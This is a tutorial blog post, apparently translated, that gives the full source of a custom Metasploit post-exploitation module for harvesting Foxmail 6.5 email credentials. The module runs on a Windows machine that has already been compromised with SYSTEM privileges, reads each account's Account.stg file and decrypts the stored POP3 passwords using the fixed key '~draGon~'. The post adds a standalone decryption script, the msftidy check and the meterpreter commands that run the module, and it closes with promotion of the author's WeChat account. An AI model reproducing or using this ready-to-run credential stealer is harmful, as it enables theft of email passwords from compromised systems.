# Metasploit: a custom post-exploitation module for harvesting login credentials

Here, taking Foxmail 6.5 as the target, we will try to decrypt the stored login credentials and then save them to the database.

Note: running this script assumes that we have already gone through a series of penetration steps and obtained SYSTEM privileges on the target Windows machine.

We write the script foxmail_decrypt_by_binghe.rb with the following content:

```ruby
##
# Author: binghe (冰河)
# Date: 2019-01-13
# Description: decrypts the stored Foxmail 6.5 login credentials
#
# The procedure is:
# 1. Search the user profiles to find the exact location of the current user's LocalAppData folder
# 2. Append \VirtualStore\Program Files(x86)\Tencent\Foxmail\mail to that location to build the full path of the mail folder
# 3. List every folder under the mail folder and collect them in an array; each folder name corresponds to a mailbox user name, for example binghe@formail.com could be one folder under mail
# 4. Look for the Account.stg file in each account folder under mail
# 5. Reading Account.stg reveals a hash named POP3Password
# 6. Pass that value to the decrypt method to obtain the plaintext password
# 7. Save these values to the database
##

require 'msf/core'

class Metasploit3 < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Post::File
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles

  def initialize(info = {})
    super(update_info(info,
      'Name'         => 'Foxmail 6.5 Credential Harvester',
      'Description'  => %q{
        This module Finds and Decrypts Stored Foxmail 6.5 Credentials
      },
      'License'      => MSF_LICENSE,
      'Author'       => ['binghe'],
      'Platform'     => ['Windows'],
      'SessionTypes' => ['Meterpreter']
    ))
  end

  # Entry point
  def run
    profile = grab_user_profiles()
    counter = 0
    data_entry = ""
    profile.each do |user|
      if user['LocalAppData']
        full_path = user['LocalAppData']
        full_path = full_path + "\\VirtualStore\\Program Files(x86)\\Tencent\\Foxmail\\mail"
        if directory?(full_path)
          print_good("Fox Mail Installed, Enumerating Mail Accounts")
          # Every sub-folder named like an e-mail address is one account
          session.fs.dir.foreach(full_path) do |dir_list|
            if dir_list =~ /@/
              counter = counter + 1
              full_path_mail = full_path + "\\" + dir_list + "\\" + "Account.stg"
              if file?(full_path_mail)
                print_good("Reading Mail Account #{counter}")
                file_content = read_file(full_path_mail).split("\n")
                file_content.each do |hash|
                  if hash =~ /POP3Password/
                    # The line looks like POP3Password=<hex>; strip any trailing \r
                    hash_data = hash.strip.split("=")
                    hash_value = hash_data[1]
                    if hash_value.nil?
                      print_error("No Saved Password")
                    else
                      print_good("Decrypting Password for mail account: #{dir_list}")
                      # Call the decrypt method
                      decrypted_pass = decrypt(hash_value, dir_list)
                      data_entry << "Username:" + dir_list + "\t" + "Password:" + decrypted_pass + "\n"
                    end
                  end
                end
              end
            end
          end
        end
      end
    end
    store_loot("Foxmail Accounts", "text/plain", session, data_entry, "Fox.txt", "Fox Mail Accounts")
  end

  # Decryption routine
  def decrypt(hash_real, dir_list)
    decoded = ""
    magic = [126, 100, 114, 97, 71, 111, 110, 126]   # the bytes of "~draGon~"
    fc0 = 90                                         # mask applied to the first (seed) byte
    size = (hash_real.length) / 2 - 1
    index = 0
    b = Array.new(size)
    # Convert the hex string into bytes
    for i in 0..size do
      b[i] = (hash_real[index, 2]).hex
      index = index + 2
    end
    b[0] = b[0] ^ fc0
    double_magic = magic + magic
    # Strip the XOR layer from every byte after the seed
    d = Array.new(b.length - 1)
    for i in 1..b.length - 1 do
      d[i - 1] = b[i] ^ double_magic[i - 1]
    end

    # Each plaintext byte is the difference to the preceding stored byte
    e = Array.new(d.length)
    for i in 0..(d.length - 1)
      if d[i] - b[i] < 0
        e[i] = d[i] + 255 - b[i]
      else
        e[i] = d[i] - b[i]
      end
      decoded << e[i].chr
    end
    print_good("Found Username #{dir_list} with Password: #{decoded}")
    return decoded
  end
end
```
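The POP3Password value is not a hash but a reversible obfuscation keyed by the fixed constant "~draGon~", which is why anyone who can read Account.stg can recover the password. The following standalone Ruby script is an added example, not the module's code: it reimplements the decrypt step outside Metasploit and pairs it with a constructed inverse (`foxmail_obfuscate`, not Foxmail's own encoder) so that a test vector can be built and round-tripped. It assumes the magic stream simply repeats every 8 bytes (the module above uses `magic + magic`, which covers only the first 16 characters).

```ruby
# MAGIC is the byte string "~draGon~"; FC0 masks the first (seed) byte.
MAGIC = '~draGon~'.bytes.freeze
FC0   = 0x5a

# Turn the hex string stored as POP3Password=<hex> back into the password.
# Assumption: the magic stream repeats every 8 bytes.
def foxmail_decrypt(hex)
  b = [hex].pack('H*').bytes
  return '' if b.length < 2
  b[0] ^= FC0                          # first byte is a masked seed
  out = []
  (1...b.length).each do |i|
    d = b[i] ^ MAGIC[(i - 1) % 8]      # undo the XOR layer
    diff = d - b[i - 1]                # undo the running addition
    out << (diff < 0 ? diff + 255 : diff)
  end
  out.pack('C*')
end

# Inverse of foxmail_decrypt, constructed here only to build test vectors;
# it is not Foxmail's own encoder. seed is the value hidden in the first byte.
def foxmail_obfuscate(password, seed = 0)
  stored = [seed ^ FC0]
  prev = seed
  password.bytes.each_with_index do |c, i|
    t = c + prev
    d = t > 255 ? t - 255 : t           # mirrors the "+ 255" wrap in decrypt
    raw = d ^ MAGIC[i % 8]
    stored << raw
    prev = raw
  end
  stored.pack('C*').unpack1('H*')
end

if __FILE__ == $PROGRAM_NAME
  sample = foxmail_obfuscate('Pa55')   # constructed value, encodes to 5a2eeb53e9
  puts "stored:    #{sample}"
  puts "recovered: #{foxmail_decrypt(sample)}"
end
```

Feeding a real POP3Password value from an Account.stg file to `foxmail_decrypt` gives the same result as the module's `decrypt` method for values of up to 16 characters.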

Then we upload the foxmail_decrypt_by_binghe.rb script to the /usr/share/metasploit-framework/modules/post/windows/gather/credentials directory on Kali.

Before running the script, we first use Metasploit's msftidy tool to check that the script's syntax is correct.

Run the following command on the Kali command line:

```
/usr/share/metasploit-framework/tools/dev/msftidy.rb /usr/share/metasploit-framework/modules/post/windows/gather/credentials/foxmail_decrypt_by_binghe.rb
```

It prints nothing, which shows that the script is correct.

Next, on the Kali command line, we run the following commands:

```
meterpreter > background
msf > set SESSION 1
msf > use post/windows/gather/credentials/foxmail_decrypt_by_binghe 
msf post(windows/gather/credentials/foxmail_decrypt_by_binghe) > show options

Module options (post/windows/gather/credentials/foxmail_decrypt_by_binghe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf post(windows/gather/credentials/foxmail_decrypt_by_binghe) > run
```

# Closing words

If you think binghe's writing is worthwhile, search for and follow the "冰河技术" WeChat public account to learn high concurrency, distributed systems, microservices, big data, internet and cloud-native technology with binghe. The "冰河技术" account has published a large number of technical series, and every article is packed with substance. Many readers have already aced their interviews and moved to major companies after reading its articles, and many others have made a leap in their skills and become the technical backbone of their companies. If you too want to improve your abilities, make that leap, join a major company and get promoted, follow the "冰河技术" WeChat public account: hard-core technical content is posted every day, so you will no longer be lost about how to level up.